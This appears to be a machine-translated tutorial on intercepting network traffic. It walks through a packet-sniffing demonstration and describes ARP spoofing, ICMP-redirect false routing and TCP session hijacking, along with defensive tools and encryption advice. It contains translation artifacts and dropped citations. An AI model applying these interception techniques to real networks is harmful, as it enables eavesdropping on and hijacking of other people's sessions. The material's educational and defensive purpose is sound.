There are also more complex technologies for intercepting important information that allow one to intrude on network interactions and change data. One such technique is spoofed ARP requests. The essence of the method is to replace IP addresses between the victim’s computer and the attacker’s device. Another method that can be used to intercept data over a network is false routing. It involves replacing the IP address of a network router with your own address. If a cybercriminal knows how the local network in which the victim is located is organized, then he can easily organize the receipt of information from the user’s machine to his IP address. Capturing a TCP connection also serves in an effective way data interception. The attacker interrupts the communication session by generating and sending TCP packets to the victim's computer. Next, the communication session is restored, intercepted and continued by the criminal instead of the client.

Object of influence

Objects of data interception over the network can be government agencies, industrial enterprises, commercial structures, and ordinary users. Within an organization or business company, information can be captured in order to protect the network infrastructure. Intelligence agencies and law enforcement agencies can carry out mass interception of information transmitted from different owners, depending on the task at hand.

If we talk about cybercriminals, then any user or organization can become an object of influence in order to obtain data transmitted over the network. With authorized access, the informative part of the information received is important, while an attacker is more interested in data that can be used to seize in cash or valuable information for its subsequent sale.

Most often, users connecting to a public network, for example in a cafe with a hotspot, become victims of information interception by cybercriminals. Wi-Fi access. An attacker connects to a web session using a sniffer, replaces data and steals personal information. Read more about how this happens in the article.

Source of threat

Authorized interception of information in companies and organizations is carried out by public network infrastructure operators. Their activities are aimed at protecting personal data, trade secrets and other important information. Legally, the transfer of messages and files can be monitored by intelligence services, law enforcement agencies and various government agencies to ensure the safety of citizens and the state.

Criminals are engaged in illegal data interception. To avoid becoming a victim of a cybercriminal, you need to follow some recommendations from experts. For example, you should not perform operations that require authorization and transfer of sensitive data in places where the connection is to public networks. It is safer to choose networks with encryption, and even better - to use personal 3G and LTE modems. When transferring personal data, it is recommended to encrypt it using the HTTPS protocol or a personal VPN tunnel.

You can protect your computer from interception of network traffic using cryptography and anti-sniffers; Dial-up rather than wireless network access will reduce risks.

This lesson describes network hacking technologies based on intercepting network packets. Hackers use such technologies to listen to network traffic in order to steal valuable information, to organize data interception for the purpose of a man-in-the-middle attack, to intercept TCP connections, allowing, say, data spoofing, and to perform other, no less interesting actions. Unfortunately, most of these attacks are actually implemented only for Unix networks, for which hackers can use both special utilities, and Unix system tools. Windows networks, apparently, have been ignored by hackers, and we are forced to limit our description of data interception tools to sniffer programs designed for trivial listening of network packets. However, one should not neglect at least a theoretical description of such attacks, especially for anti-hackers, since knowledge of the hacking technologies used will help prevent many troubles.

Network sniffing

Typically used for sniffing Ethernet networks. network cards switched to listening mode. Listening Ethernet networks requires connecting a computer running a sniffer program to a network segment, after which all network traffic sent and received by computers in this network segment becomes available to the hacker. It is even easier to intercept traffic from radio networks that use wireless network intermediaries - in this case, you do not even need to look for a place to connect to the cable. Or an attacker can connect to the telephone line connecting the computer to the Internet server, finding a convenient place for this (telephone lines are usually laid in basements and other rarely visited places without any protection).

To demonstrate sniffing technology, we will use the very popular sniffer program SpyNet, which can be found on many Web sites. The official website of the SpyNet program is located at http://members.xoom.com/layrentiu2/, where you can download a demo version of the program.

The SpyNet program consists of two components - CaptureNet and PipeNet. The CaptureNet program allows you to intercept packets transmitted over an Ethernet network at the network level, i.e. in the form of Ethernet frames. PipeNet software allows you to assemble Ethernet frames into application layer packets, restoring, for example, messages Email, HTTP protocol messages (exchange of information with the Web server) and perform other functions.

Unfortunately, in the SpyNet demo, PipeNet's capabilities are limited to the HTTP packet assembly demo, so we won't be able to demonstrate SpyNet in full. However, we will demonstrate the network sniffing capabilities of SpyNet using our experimental network as an example by passing text file from the Sword-2000 host to the Alex-Z host using the usual Windows Explorer. At the same time, on the A1ex-1 computer we will launch the CaptureNet program, which will intercept the transmitted packets and allow us to read the contents of the transmitted file in Ethernet frames. In Fig. 1 shows the text of the secret message in the file secret.txt; we will try to find this text in the captured Ethernet frames.

Rice. 1. Text of the secret message in the Notepad window

To capture Ethernet frames, follow these steps:

On the Alex-Z computer, run the CaptureNet program. In the displayed working window of the program, select the menu command Capture * Start (Capture * Start) and start the process of intercepting network frames.

Using Windows Explorer, copy the security.txt file from the Sword-2000 computer to A1ex-3.

After transferring the secret.txt file, select the Capture * Stop menu command and stop the capture process.

The captured Ethernet frames will appear on the right side of the CaptureNet program window (Figure 2), with each row in the top list representing an Ethernet frame, and below the list the contents of the selected frame.

Rice. 2. Ethernet frame contains secret message text

Having looked through the list of intercepted frames, we can easily find the one that contains the text we transmitted This is a very big secret (This is a very big secret).

We emphasize that this is the simplest example, when all intercepted network traffic was recorded. CaptureNet allows you to intercept packets sent over specific protocols and to specific host ports, select messages with specific content, and accumulate the captured data in a file. The technique for performing such actions is simple, and can be learned using the help system of the SpyNet program.

In addition to primitive network eavesdropping, hackers have access to more sophisticated means of data interception. Below is a brief overview of such methods, albeit from a theoretical aspect. The reason is that for Windows networks, the practical implementation of data interception attacks is extremely limited, and the set of reliable utilities for interception attacks is quite poor.

Methods for intercepting network traffic

Network sniffing using network analyzer programs like CaptureNet above is the first, simplest way to intercept data. In addition to SpyNet, many tools are used for network sniffing, initially developed for the purposes of analyzing network activity, diagnosing networks, selecting traffic according to specified criteria, and other network administration tasks. An example of such a program is tcpdump (http://www.tcpdump.org), which allows you to record network traffic in a special log for subsequent analysis.

To protect against network eavesdropping, special programs are used, for example, AntiSniff (http://www.securitysoftwaretech.com/antisniff), which are capable of identifying computers on the network that are listening to network traffic. To solve their problems, antisniffer programs use a special sign of the presence of listening devices on the network - the network card of the sniffer computer must be in a special listening mode. While in listening mode, network computers react in a special way to IP datagrams sent to the host being tested. For example, listening hosts typically process all incoming traffic, not just datagrams sent to the host's address. There are other signs that indicate suspicious host behavior that AntiSniff can recognize.

False ARP requests

To intercept and take over the process of network interaction between two hosts A and B, an attacker can replace the IP addresses of interacting hosts with his own IP address by sending falsified ARP (Address Resolution Protocol) messages to hosts A and B. You can get acquainted with the ARP protocol in Appendix D, which describes the procedure for resolving (converting) the host's IP address to the machine address (MAC address) hardcoded into the host's network card. Let's see how a hacker can use ARP to intercept network communications between hosts A and B.

The attacker determines the MAC addresses of hosts A and B, for example, using the nbtstat command from the W2RK package.

The attacker sends messages to the identified MAC addresses of hosts A and B, which are falsified ARP responses to requests for resolving the hosts' IP addresses to the MAC addresses of computers. Host A is informed that the IP address of host B corresponds to the MAC address of the attacker’s computer; host B is informed that the IP address of host A also corresponds to the MAC address of the attacker’s computer.

Hosts A and B store the received MAC addresses in their ARP caches and then use them to send messages to each other. Since IP addresses A and B correspond to the MAC address of the attacker’s computer, hosts A and B, unsuspectingly, communicate through an intermediary who can do anything with their messages.

To protect against such attacks, network administrators must maintain a database with a table of correspondence between the MAC addresses and IP addresses of their network computers. Next, using a special software For example, the arpwatch utilities (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) can periodically survey the network and identify inconsistencies.

On UNIX networks, this type of spoofed ARP request attack can be implemented using system utilities for monitoring and managing network traffic, such as arpredirect. Unfortunately, such reliable utilities do not seem to be implemented on Windows 2000/XP networks. For example, on the NTsecurity website (http://www.ntsecurity.nu) you can download the GrabitAII utility, presented as a tool for redirecting traffic between network hosts. However, a basic check of the functionality of the GrabitAII utility shows that complete success in implementing its functions is still far away.

False routing

To perform false routing, the attacker must know some details about the organization of the local network in which host A is located, in particular, the IP address of the router through which traffic is sent from host A to B. Knowing this, the attacker will generate an IP datagram in which IP -the sender address is defined as the IP address of the router, and the recipient is host A. Also included in the datagram is an ICMP Redirect message with the address field of the new router set to the IP address of the attacker's computer. Having received such a message, host A will send all messages to the IP address of the attacker's computer.

The above examples of interceptions (to which the capabilities of attackers are far from limited) convince us of the need to protect data transmitted over the network if the data contains confidential information. The only method of protection against interceptions of network traffic is the use of programs that implement cryptographic algorithms and encryption protocols and prevent the disclosure and substitution of secret information. To solve such problems, cryptography provides tools for encrypting, signing and verifying the authenticity of messages transmitted over secure protocols

The practical implementation of all the cryptographic methods for protecting information exchange described in Chapter 4 is provided by VPN (Virtual Private Network) networks. A brief overview of cryptographic security principles and techniques can be found in Appendix E, and detailed description cryptographic protection tools provided by the PGP Desktop Security application (http://www.pgp.com).

TCP connection interception

Several effective utilities have been created to perform TCP connection hijacking attacks, but all of them are implemented for the Unix platform, and on Web sites these utilities are presented only in source code form. Thus, as convinced practitioners of the noble cause of hacking, attacks using the TCP connection interception method are not of much use to us. (Those who like to understand other people's program code can refer to the site http://www.cri.cz/~kra/index.html, where you can download source the well-known Hunt TCP connection interception utility from Pavel Krauz).

Despite the lack of practical tools, we cannot ignore such an interesting topic as intercepting TCP connections, and we will dwell on some aspects of such attacks. Some information about the structure of a TCP packet and the procedure for establishing TCP connections is given in Appendix D of this book, but here we will focus on the question - what exactly allows hackers to carry out TCP connection interception attacks? Let us consider this topic in more detail, relying mainly on the discussion in and.

The TCP protocol (Transmission Control Protocol) is one of the basic OSI transport layer protocols that allows you to establish logical connections over a virtual communication channel. Over this channel, packets are transmitted and received with their sequence recorded, the flow of packets is controlled, retransmission of distorted packets is organized, and at the end of the session the communication channel is broken. The TCP protocol is the only core protocol in the TCP/IP family that has an advanced message identification and connection system.

To identify a TCP packet, there are two 32-bit identifiers in the TCP header, which also act as packet counters, called sequence number and acknowledgment number. We will also be interested in one more field of the TCP packet, called control bits. This 6-bit field includes the following control bits (in order from left to right):

URG - urgency flag;

ACK - confirmation flag;

PSH - carry flag;

RST - connection re-establishment flag;

SYN - synchronization flag;

FIN - connection termination flag.

Let's look at the procedure for creating a TCP connection.

1. If host A needs to create a TCP connection with host B, then host A sends host B the following message:

A -> B: SYN, ISSa

This means that the message sent by host A has the SYN flag (Synchronize sequence number) set, and the sequence number field is set to the initial 32-bit value ISSa (Initial Sequence Number).

2. In response to the request received from host A, host B responds with a message in which the SYN bit is set and the ACK bit is set. In the sequence number field, host B sets its initial counter value - ISSb; the acknowledgment number field will then contain the ISSa value received in the first packet from host A, increased by one. So host B responds with this message:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Finally, host A sends a message to host B, in which: the ACK bit is set; the sequence number field contains the value ISSa + 1; The acknowledgment number field contains the value ISSb + 1. After this, the TCP connection between hosts A and B is considered established:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Now host A can send data packets to host B over the newly created virtual TCP channel:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA

Here DATA stands for data.

From the algorithm for creating a TCP connection discussed above, it can be seen that the only identifiers of TCP subscribers and a TCP connection are two 32-bit parameters of the sequence number and acknowledgment number - ISSa and ISSb. Therefore, if a hacker manages to find out the current values of the ISSa and ISSb fields, then nothing will prevent him from generating a falsified TCP packet. This means that a hacker only needs to select the current values of the ISSa and ISSb parameters of a TCP packet for a given TCP connection, send the packet from any Internet host on behalf of the client of this TCP connection, and this packet will be perceived as correct!

The danger of such TCP packet spoofing is also important because the high-level FTP and TELNET protocols are implemented based on the TCP protocol, and the identification of FTP and TELNET packet clients is entirely based on the TCP protocol.

In addition, since the FTP and TELNET protocols do not check the IP addresses of message senders, after receiving a falsified packet, the FTP or TELNET servers will send a response message to the IP address of the hacker host specified in the false packet. After this, the hacker host will start working with the FTP or TELNET server from its IP address, but with the rights of a legally connected user, who, in turn, will lose contact with the server due to mismatch of counters.

Thus, to carry out the attack described above, a necessary and sufficient condition is knowledge of the two current 32-bit parameters ISSa and ISSb that identify the TCP connection. Let's consider possible ways receiving them. In the case when the hacker host is connected to the attacked network segment, the task of obtaining the values of ISSa and ISSb is trivial and can be solved by analyzing the network traffic. Therefore, it is necessary to clearly understand that the TCP protocol allows, in principle, to protect a connection only if it is impossible for an attacker to intercept messages transmitted over this connection, that is, only in the case when the hacker host is connected to a network segment different from the subscriber segment of the TCP connection.

Therefore, intersegment attacks are of greatest interest to a hacker, when the attacker and his target are in different network segments. In this case, the task of obtaining the values of ISSa and ISSb is not trivial. To solve this problem, only two methods have now been invented.

Mathematical prediction of the initial value of TCP connection parameters by extrapolation of previous values of ISSa and ISSb.

Exploiting vulnerabilities in identifying TCP connection subscribers on Unix rsh servers.

The first task is solved through in-depth studies of the implementation of the TCP protocol in various operating systems and now has a purely theoretical significance. The second problem is solved using vulnerabilities Unix systems by identifying trusted hosts. (Trusted with respect to a given host A is a network host B whose user can connect to host A without authentication using the r-service of host A). By manipulating the parameters of TCP packets, a hacker can try to impersonate a trusted host and intercept a TCP connection with the attacked host.

All this is very interesting, but the practical results of this kind of research are not yet visible. Therefore, we advise everyone who wants to delve deeper into this topic to turn to the book, from where the information presented above was mainly taken.

Conclusion

Intercepting network data is the most effective method of network hacking, allowing a hacker to obtain almost all the information circulating on the network. The greatest practical development has been achieved by sniffing tools, i.e. listening to networks; However, we cannot ignore methods of intercepting network data, performed by interfering with the normal functioning of the network in order to redirect traffic to a hacker host, especially methods of intercepting TCP connections. However, in practice, the last mentioned methods have not yet received sufficient development and need to be improved.

An anti-hacker should know that the only salvation from data interception is its encryption, i.e. cryptographic protection methods. When sending a message over the network, you should assume in advance that the network's cable system is absolutely vulnerable, and any hacker connected to the network will be able to catch all transmitted secret messages from it. There are two technologies for solving this problem - creating a VPN network and encrypting the messages themselves. All these tasks are very easy to solve using the PGP Desktop Security software package (its description can be found, for example, in).

Popular in the category: